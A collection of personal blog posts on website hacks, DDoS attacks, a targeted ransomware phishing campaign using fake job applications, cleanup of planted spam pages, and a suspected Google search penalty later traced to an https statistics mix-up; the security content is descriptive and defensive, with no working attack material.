If hardware security cannot be regulated, there might be more regulation of internet traffic. Internet Service Providers could be held accountable to remove compromised devices from their networks, for example after having noticed the end user several times. Or smaller ISPs might be cut off by upstream providers. Somewhere in the chain of service providers we will have to deal with more monitoring and regulation, and in one way or other the playful days of the earlier internet (romanticized with hindsight, maybe) are over.

When I saw Krebs’ site going offline, I wondered what small business should do in general: His site is now DDoS-protected by Google’s Project Shield, a service offered to independent journalists and activists after his former pro-bono host could not deal with the load without affecting paying clients. So one of the Siren Servers I commented on critically so often came to rescue! A small provider will not be able to deal with such attacks.

WordPress.com should be well-protected, I guess. I wonder if we will all end up hosting our websites at such major providers only, or ‘blog’ directly to Facebook, Google, or LinkedIn (now part of Microsoft) to be safe. I had advised against self-hosting WordPress myself: If you miss security updates you might jeopardize not only your website, but also others using the same shared web host. If you live on a platform like WordPress dot com or Google, you will complain from time to time about limited options or feature updates you don’t like – but you don’t have to care about security. I compare this to avoiding legal issues as an artisan selling hand-made items via Amazon or the like, in contrast to having to update your own shop’s business logic after every change in international tax law.

I have no conclusion to offer. Whenever I read news these days – on technology, energy, IT, anything in between, The Future in general – I feel reminded of this tension: Between being an independent neutral netizen and being plugged in to an inescapable matrix, maybe beneficial but Borg-like nonetheless.

Have I Seen the End of E-Mail?

Not that I desire it, but my recent encounters of ransomware make me wonder.

Some people in say, accounting or HR departments are forced to use e-mail with utmost paranoia. Hackers send alarmingly professional e-mails that look like invoices, job applications, or notifications of postal services. Clicking a link starts the download of malware that will encrypt all your data and ask for ransom.

Theoretically you could still find out if an e-mail was legit by cross-checking with open invoices, job ads, and expected mail. But what if hackers learn about your typical vendors from your business website or if they read your job ads? Then they would send plausible e-mails and might refer to specific codes, like the number of your job ad.

Until recently I figured that only medium or larger companies would be subject to targeted attacks. One major Austrian telco was victim of a Denial of Service attacked and challenged to pay ransom. (They didn’t, and were able to deal with the attack successfully.)

But then I have encountered a new level of ransomware attacks – targeting very small Austrian businesses by sending ‘expected’ job applications via e-mail:

  • The subject line was Job application as [a job that had been advertised weeks ago at a major governmental job service platform]
  • It was written in flawless German, using typical job applicant’s lingo as you learn in trainings.
  • It was addressed to the personal e-mail of the employee dealing with applications, not the public ‘info@’ address of the business
  • There was no attachment – so malware filters could not have found anything suspicious – but only a link to a shared cloud folder (‘…as the attachments are too large…’) – run by a a legit European cloud company.
  • If you clicked the link (which you should not so unless you do this on a separate test-for-malware machine in a separate network) you saw a typical applicant’s photo and a second file – whose name translated to JobApplicationPDF.exe.

Suspicious features:

  • The EXE file should have triggered red lights. But it is not impossible that a job application creates a self-extracting archive, although I would compare that to wrapping your paper application in a box looking like a fake bomb.
  • Google’s Image Search showed that the photo has been stolen from a German photographer’s website – it was an example for a typical job applicant’s photo.
  • Both cloud and mail service used were less known ones. It has been reported that Dropbox had removed suspicious files so it seemed that attackers turned to alternative services. (Both mail and cloud provider reacted quickly and shut down the suspicious accounts)
  • The e-mail did not contain a phone number or street address, just the pointer to the cloud store: Possible but weird as an applicant should be eager to encourage communications via all channels. There might be ‘normal’ issues with accessing a cloud store link (e.g. link falsely blocked by corporate firewall) – so the HR department should be able to call the applicant.
  • Googling the body text of the e-mail gave one result only – a new blog entry of an IT professional quoting it at full length. The subject line was personalized to industry sector and a specific job ad – but the bulk of the text was not.
  • The non-public e-mail address of the HR person was googleable as the job ad plus contact data appeared on a job platform in a different language and country, without the small company’s consent of course. So harvesting both e-mail address and job description automatically.

I also wonder if my Everything as a Service vision will provide a cure: More and more communication has been moved to messaging on social networks anyway – for convenience and avoiding false negative spam detection. E-Mail – powered by old SMTP protocol with tacked on security features, run on decentralized mail servers – is being replaced by messaging happening within a big monolithic block of a system like Facebook messaging. Larger employers already require their applications to submit their CVs using their web platforms, as well as large corporations demand that their suppliers use their billing platform instead of sending invoices per e-mail.

What needs to be avoided is downloading an executable file and executing it in an environment not controlled by security policies. A large cloud provider might have a better chance to enforce security, and viewing or processing an ‘attachment’ could happen in the provider’s environment. As an alternative all ‘our’ devices might be actually be part of a service and controlled more tightly by centrally set policies. Disclaimer: Not sure if I like that.

Iconic computer virus - from my very first small business website in 1997. Image credits mine.

(‘Computer virus’ – from my first website 1997. Credits mine)

 

Shortest Post Ever

… self-indulgent though, but just to add an update on the previous post.

My new personal website is  live:

elkement.subversiv.at

I have already redirected the root URLs of the precursor sites radices.net, subversiv.at and e-stangl.at. Now I am waiting for Google’s final verdict; then I am going to add the rewrite map for the 1:n map of old ASP files and new ‘posts’. This is also the pre-requisite for informing Google about the move officially.

The blog-like structure and standardized attributes like Open Graph meta tags and a XML sitemap should make my site more Google-likeable. With the new site – and one dedicated host name only – I finally added permanent redirects (HTTP 301). Before I used temporary (HTTP 302) redirects, to send requests from the root directory to subfolders, which (so the experts say) is not search-engine-friendly.

On the other hand the .at domain will not help: You can pick a certain country as preferred audience for a non-country domain, but I have to stick with Austria here, even if the language is set to English in all the proper places (I hope).

I have discovered that every WordPress.com Tag or Category has its own feed – just add /feed/ to the respective URLs – and I will make use this in order to automate some of my link curation, like this. This list of physics postings has been created from this feed of selected postings:
https://elkement.wordpress.com/category/science-and-technology/physics/feed/
Of course this means re-tagging and re-categorizing here! Thanks WordPress for the Tags to Categories (and vice versa) Conversion Tools!

It is fun to watch my server’s log files more closely. Otherwise I would have missed that SQL injection attack attempt, trying to put spammy links on my website (into my database):

SQL injection by spammer-hackers

Looking for Patterns

Scott Adams, of Dilbert Fame, has a lot of useful advice in his autobiographical book How to Fail at Almost Everything and Still Win Big. He recommends looking for patterns in your life, without attempting to theorize about cause and effects. Learning from those patterns you could increase the chance that luck with hit you. I believe in increasing your options, so I can relate a lot to applying this approach to Life, the Universe and Everything.

It should be true in relation to the iconic example of patterns, that is: Web traffic. In this post I’ll try to briefly summarize what I have learned so far from most recent unfortunate events (This is PR speak for disaster). I was intrigued by web statistics, web servers’ log files, and the summaries show by the free Google or Bing Webmaster Tools ever since, but I started to follow the trends more closely after my other, non-Wordpress web server had been hacked by the end of November.

How do you recognize that your site has been hacked?

This is very different from what you might expect from popular lore and movies. I downloaded the log files for my web server from time to time, and I just noticed that suddenly the size of the daily files was about twice as usual. Inspecting the IP addresses which the traffic to my site came from I spotted a lot of hits by Google bot. Sites are indexed all the time, but I was baffled by the URLs – all pointing to pages that should not exist on my server. These URLs contained a long query string with all kinds of brand names, as you know them from spam comments or e-mails.

This is an example line in the log file:

Spammy page on hacked web server, accessed by Google botThis IP address belongs to a *.googlebot.com machine, as can be confirmed by resolving the name, e.g. using nslookup. The worrying fact was the status code 200 which means the page had indeed been there.

A few days later this has changed to a 404, so the page did not exist anymore:

Spammy page removed from hacked web server, Google bot tries to access it.The attack had happened in the weekend, and the pages have been removed immediately by my hosting provider.

I cross-checked if those pages had indeed been indexed by Google I searched for site:[domain name]. This is a snippet from the search results – the spammers even borrowed the tag line of our legitimate site as a description (which I cropped from the screenshot here).

spammy-page-in-google-indexOverall these were just a bunch of different pages (ASP files) but Google recognizes every different query string, appended after the question mark, as a different URL. So suddenly Google had a lot more URLs to index and you could see a spike in web master tools:

Crawl stats after hackThere was also a warning message on the welcome page:

Google warning message about 404 errorsWhat to do?

Obviously the first thing is to delete the spammy pages and deal with whatever vulnerability had been exploited. This was done before I noticed the hack myself. But I am still in clean-up mode to get the spammy pages removed from Google’s index:

robots.txt. Using the site:[domain name] search I identified all the spammy pages and added them to the robots.txt file on my server. This file tells search engines which pages not to index. Fortunately you do not have to add each individual URL – adding the page (ending in .asp in this case) is sufficient.

But pages were still in the index after that, just the description was changed to:
A description for this result is not available because of this site’s robots.txt.

As far as I can tell, entries are still added to the index if somebody else links to your pages (actually, spammy pages on other hacked servers, see root cause analysis below). But as Google is not allowed to investigate the target as per robots.txt, it only adds the link without a description.

URL parameters. Since the spammy pages all use query strings and all strings have the same parameter – [page].asp?dca= in my case – I tried managing the URL parameters via web master tools. This is actually an option to let Google know if a query string should really denote another version of a page or if all query strings for one page should be indexed as a single page. E.g. I am using a query string called imgClicked to magnify an image when clicking in the top image, and I could tell Google that the clicked / unclicked image should not be counted as different URLs.

In the special case of the spammy pages I tried to tell Google that different dca values don’t make for a separate page (which would result in about 6 spammy URLs in the index instead of 1500) but this did not impact the gradual accumulation of indexed spammy pages.

Mind-numbing work. To get rid of all pages as fast as possible I also removed each. of. them. manually. via Google master tools. This means:

  • Click on the URL from the search results, opening a new tab. This results in a 404.
  • Copy the URL from the address bar to web master tools in the form for removing the URL.
  • Click submit.
  • Repeat 1500 times.

I am now at about 500. Not all spammy pages that ever existed are displayed at once in the index, but about 10 are added every day. Where do they come from after the original pages had been deleted?

How was this hack actually supposed to work?

The legitimate pages had not been changed or vandalized but the hacker-spammers just placed additional pages on the server. I had never noticed them, had I not encountered Google’s indexing activities.

I was curious how those pages had looked like and I inspected Google’s cache, by searching for cache:[spammy URL]. The cached page consisted of:

  • Your typical junk of spammy text, otherwise I would be delighted about raw material for poetry.
  • A list of links to other spammy pages, most of them on my hacked server
  • An exact copy of the default page of this (legitimate) web site.

I haven’t investigated all those more than 1000 pages and spammy links displayed on them but I conjectured there have to be some outbound links to other – hacked – servers Links will be only boosted if there are backlinks from seemingly independent web sites. Somehow this should make people buy something in a shady webshop at the end of a cascade of links.

After some weeks I was able to confirm this as Google web master tools now show external backlinks to my domain from other spammy pages on legitimate sites, mostly small businesses in the US. Many of them used the same provider that obviously had been hacked as well.

This explains where the gradual supply of spammy links to the index comes from: Google has followed the spammy links from the other hacked servers inbound to my server. It seems to take a while to clean this out as all the other webmasters have removed there pages as well – I checked each. of. them. from the long list supplied by Google as a CSV file.

Hadn’t I been hacked I might have never been aware of the completely unrelated onslaught by Google itself, targeted to this blog. I reported on this in detail previously; here is just an update and a summary.

Edit as from the comments I conclude this was not clear: The following analysis is unrelated to the hack of non-Wordpress site – the hacked site had not been penalized so far by Google. But the blog you are reading right now was.

Symptoms of your site having been penalized by a search engine

Rapid decline of impressions. Webmaster tools show a period of 3 months maximum. I have checked the trend for all my sites now and then, but there was actually never anything that constituted a real trend. But for this blog page impressions went from a few hundred, often more than 1000 per day this summer to less than 10 per day now.

Page impressions Sept to DecPage impressions stayed at their all-time-low since last time, so just extend that graph to the right.

Comparison with sites that should rank much lower. Currently this blog has as much or as few impressions as my personal website e-stangl.at. Its Google pagerank is 1 – as compared to 3 for the WordPress blog; I only update it every quarter at maximum, and its word count is perhaps a thousands of this blog.

My other two sites subversiv.at and radices.net score better although I update them only about once every 6 weeks, and I am pretty sure I violate best practices due to my creative mixing languages, commenting on my own stuff, and/or curating enormous lists of outbound links.

It is ironic that Google has penalized this blog now, as per autumn 2014 my quality control has become more ruthless. I had quite a number of posts in Drafts, with more than 1000 words each, edited, and spell-checked – and finally deleted all of them. The remaining posts were the ones requiring considerable research plus my poetry. This spam poem is one of my most popular posts as by Google’s page impressions. So all theorizing is really futile and I should better watch the pattern emerge.

Identifying offending pages. I added an update to the previous post as I spotted the offending pages using the following method:

  • Identify your top performing pages by ranking pages in the list of search results by impressions or clicks.
  • Then order pages in the list of search results by page name. This is effectively ranking by date for blogs, and the list can be compared to the archive of all pages.
  • Make the time span covered by the Google tools smaller and smaller and check if one your former top pages is suddenly vanishing from the list.

In my case these pages were:

  • A review of a new, a bit unconventional, textbook on quantum field theory and
  • a list of physics books, blogs and websites.

As a reader pointed out correctly this does not mean that the page has been deleted from the index – as you can confirm by searching for site:[Offending URL] explicitly or by adding a more specific search criterion, like adding elkement. I found that the results displayed for my offending pages are erratic: Sometimes, surprisingly, the page will still show up if I just use the title of the post; perhaps a consequence of me, owner of the site, being logged on to Google. Sometimes I need to add an additional keyword to move it to the top in search results again.

But anyway, even if the pages had not been deleted, they had been pushed back to search results page >10.

Something had been deleted from the index though. Here is the number of indexed pages over time, showing a decline starting at the time impressions were plummeting, too:

Pages indexed by Google for this blog as per writing of this postI cannot see a similar effect for any of the other sites, and as far as I know it does not correlate with some Google update (Google has indicated a major update in March 2014 in the figure).

Find the root cause. Except from links on my own sites, and links on other other blogs my blog has no backlinks. As I learned in this research backlinks from forums are often tagged nofollow so that search engines would not consider them spammy. This means links from your avatar commenting on other pages might not boost your blog, but might not hurt either.

The only ‘worthy’ backlink was from the page dedicated to that book I had reviewed – and that page linked exactly to the offending pages. My blog and the author’s page may look to Google as the tangle of cross-linked spammy pages hackers had misused my other web server for.

Do something about it? Conclusion? I replaced some of my links to the author’s site with a link to the book’s page on amazon.com. I moved one of the offending pages, the physics link list, over to radices.net – as I had planned to do so for quite a while in my eternal quest for tidy, consistent web sites. The page is still available on this blog, but not visible in the menu anymore.

But I will not ask the author to remove a valid backlink or remove my innocuous post, it seems like succumbing to the rules of a silly game.

What I learned from this episode is that one single page – perhaps one you don’t even consider important on the grand scale of things and your blog in particular – can boost a blog or drag it down. Which pages are the chosen ones is beyond unpredictable.

Ending on a more positive note I currently encounter the boost effect for your German blog as we indulge in writing about the configuration of this gadget, the programmable control unit we use with our heat pump system. The device is very popular among ambitious DIY enthusiasts, and readers are obviously searching for it.

Programmable control unit

We are often linking to the vendor’s business page and manuals. I hope they will never link back to us.

I will just keep watching the patterns and reporting on my encounters. One of the next enigmas to be resolved: Why is the number of Google searches in my WordPress Stats much higher than the number of page impressions in Google Tools for that day, let alone clicks in Google Tools?

Update 2015-01-23: The answer was embarrassingly simple, and all my paranoia had been misguided. WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.

Waging a Battle against Sinister Algorithms

I have felt a disturbance of the force.

As you might expect from a blog about anything, this one has a weird collection of unrelated top pages and posts. My WordPress Blog Stats tell me I am obviously an internet authority on: how rodents get into kitchen appliances, about the physics of a spinning toy, about the history of the first heat pump, and most recently about how to sniff router traffic. But all those posts and topics are eclipsed by the meteoric rise of the single most popular ever article, which was a review of a book on a subfield in theoretical physics. I am not linking this post or quoting its title for reasons you might understand in a minute.

Checking out Google Webmaster Tools the effect is even more pronounced. Some months ago this textbook review attracted by far the most Google search impressions and clicks. Looking at the data from the perspective of a bot it might appear as if my blog had been created just to promote that book. Which is, what I believe might actually had happened.

Concluding from historical versions of the book author’s website (on archive.org), the page impressions of my review started to surge when he put a backlink to my post on his page, some when in spring this year.

But then in autumn this happened.

Page impressions for this blog on Google Webmaster Tools, Sept to Dec.These are the impressions for searches from desktop computers (‘Web’), without image or mobile search. A page impression means that  the link had been displayed on Google Search Results pages to some user. The curve does not change much if I remove the filter for Web.

For this period of three months, that article I Shall Not Quote is the top page in terms of impressions, right after the blog’s default page. I wondered about the reason for this steep decline as I usually don’t see any trend within three months on any of my sites.

If I decrease the time slot to the past month that infamous post suddenly vanishes from the top posts:

Page impressions and top pages in the last monthIt was eradicated quickly – which can only be recognized when decreasing the time slot step-by-step. With a few days at the end of October / beginning of November the entry seems to have been erased from the list of impressions.

I sorted the list of results shown above by the name of the page, not by impressions. Since WordPress posts’ names are prefixed with dates you would expect to see any of your posts in that list somewhere, some of them of course with very slow scores. Actually, that list does include also obscure early posts from 2012 nobody ever clicks at.

The former top post, however, did not get a single impression anymore in the past month. I have highlighted the posts before and after in the list, and I have removed all filters for this one, thus also image and mobile search are taken into account. The post’s name started with /2013/12/22/:

Last month, top pages, recent top post missingChecking the status of indexed pages in total confirms that links have been recently removed:

Index status of this blogFor my other sites and blogs this number is basically constant – as long as a website does not get hacked. As our business site actually has been a month ago. Yes, I only mention this in passing as I am less worried about that hack than about that mysterious penalizing of this blog.

I learned that your typical hack of a website is less spectacular that what hacker movies let you believe: If you are not a high-profile target, hacker-spammers leave your site intact, but place additional spammy pages with cross-links on your site to promote their links. You recognize this immediately by a surge of the number of URLs, of indexing activities, and – in case your hoster is as vigilant as mine – a peak in 404 not found errors after that spammy pages have been removed. This is the intermittent spike in spammy pages on our business page crawled by Google:

Crawl stats after hackI used all tools at my disposal to clean up the mess the hackers caused – those pages actually have been indexed already. It will take a while until things like ‘fake Gucci belts’ will be removed from our top content keywords, after I removed the links from the index by editing robots.txt, and using the Google URL removal tool and the URL parameters tool (the latter comes in handy as the spammy pages have been indexed with various query strings, that is: parameters).

I have expected the worst but Google have not penalized me for that intermittent link spam attack (yet?). Numbers are now back to normal after a peak in queries for those fake brand stuff:

Queries back to normal after clean-up.It was an awful lot of work to clean those URLs popping up again and again every day. I am willing to fight the sinister forces without too much whining. But Google’s harsh treatment of the post on this blog freaks me out. It is not only the blog post that was affected but also the pages for the tags, categories and archive entries. Nearly all of these pages – thus all the pages linking to the post – did not get a single impression anymore.

Google Webmaster Tools also tells me that the number of so-called Structured Data for this blog had been reduced to nearly zero:

Structured data on this blogStructured Data are useful for pages that show e.g. product reviews or recipes – anything that should have a pre-defined structure that might be presented according to that structure in Google search results, via nice formatted snippets. My home-grown websites do not use those, but the spammer-hackers had used such data in their link spam pages – so on our business site we saw a peak in structured data at the time of the hack.

Obviously WP blogs use those per design. Our German blog is based on the same WP theme – but the number of structured data there has been constant. So if anybody out there is using theme Twenty Eleven I would be happy to learn about your encounters with structured data.

I have read a lot: what I never wanted to know about search engine optimization. This also included hackers’ Black SEO. I recommend the book Spam Nation by renowned investigative reporter and IT security insider Brian Krebs, published recently. Whose page and book I will again not link.

What has happened? I can only speculate.

Spammers build networks of shady backlinks to promote their stuff. So common knowledge is of course that you should not buy links or create such network scams. Ironically, I have cross-linked all my own sites like hell for many years. Not for SEO purposes but in my eternal quest for organizing my stuff, keeping things separate, but adding the right pointers though, Raking the virtual Zen Garden etc. Never ever did this backfire. I was always concerned about the effect of my links and resources pages (links to other pages, mainly tech and science). Today my site radices.net which was once an early German predecessor of this blog is my big link dump – but still these massive link collections are not voted down by Google.

Maybe Google considers my posting and the physics book author’s website part of such a link scam. I have linked to the author’s page several times – to sample chapters, generously made available via download as PDFs, and the author linked back to me. I had refused to tie my blog to my Google+ account and claim ‘Google authorship’ so far as I don’t wanted to trade elkement for my real name on G+. Via Webmaster tools Google knows about all my domains but they might suspect I – a pseudo-anonymous elkement, using an @subversiv.at address on G+ – might also own the book author’s domain that I – diabolically smart – did not declare in Webmaster Tools.

As I said before, from a most objective perspective Google’s rationale might not be that unreasonable. I don’t write book reviews that often, my most recent were about The Year Without Pants and The Glass Cage. I rather write posts triggered by one idea in a book, maybe not even the main one. When I write about books I don’t use Amazon Affiliate marketing – as professional reviewers such as Brain Pickings or Farnam Street do. I write about unrelated topics. I might not match the expected pattern. This is amusing as long as only a blog is concerned but on principle it is similar as being interviewed by the FBI at an airport because your travel pattern just can’t be normal (as detailed in the book Bursts, on modelling human behaviour – a book I also sort of reviewed last year).

In short, I sometimes review and ‘promote’ books without any return on that. I simply don’t review books I don’t like as I think blogging should be fun. Maybe in an age of gamified reviews and fake forum posts with spammy signatures Google simply doesn’t buy into that. I sympathize. I learned that forums websites shod add a nofollow tag to any hyperlinks users post so that Google will now downvote the link targets. So links in discussion groups are considered spammy per se and you need to do something about it so that they don’t hurt what you – as a forum user – are probably trying to discuss or recommend in good faith. I already live in fear that those links some tinkerers set in DIYer’s forums (linking to our business site or my posts on our heating system) will be considered paid link spam.

However, I cannot explain why I can find my book review post on Google (thus generating an impression) when searching for site:[URL of the post]. Perhaps consolidation takes time. Perhaps there is hope. I even see the post when I use Tor Browser and a foreign IP address so this is not related to my preferences as a logged on Google user. But if there isn’t a glitch in Webmaster Tools, no other typical searcher encounters this impression. I am aware of the tool for disavowing URLs but I don’t want to report a perfectly valid backlink. In addition, that backlink from the author’s site does not even show up in the list of external backlinks which is another enigma.

I know that this seems to be an obsession with a first world problem: This was an post on a topic I don’t claim expertise or that I don’t consider strategically important. But whatever happens to this blog could happen to other sites I am more concerned about, business-wise. So I hope if is just a bug and/or Google Bots will read this post and will release my link. Just in case I mentioned your book or blog here, even if indirectly, please don’t backlink.

Perhaps Google did not like my ranting about encrypted search terms, not available to the search term poet. I dared to display the Bing logo back then. Which I will do again now as:

  • Bing tells me that the infamous post generates impressions and clicks
  • Bing recognizes the backlink
  • The number of indexed pages is increasing gradually with time.
  • And Bing did not index the spammy pages in the brief period they were on our hacked website.

Bing logo (2013)Update 2014-12-23 – it actually happened twice:

Analyzing the impressions from the last day I realize that Google has also treated my physics resources page Physics Books on the Bedside Table this way. Page impressions dropped and now that page which was the top one (after the review had plummeted) is gone, too. I had already considered to move this page to my site that hosts all those list of links (without issues, so far): radices.net, and I will complete this migration in a minute. Now of course Google might think I, the link spammer, am frantically moving on to another site.

Update 2014-12-24 – now at least results are consistent:

I cannot see my own review post anymore when I search for the title of the book. So finally the results from Webmaster Tools are in line with my tests.

Update 2015-01-23 – totally embarrassing final statement on this:

WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.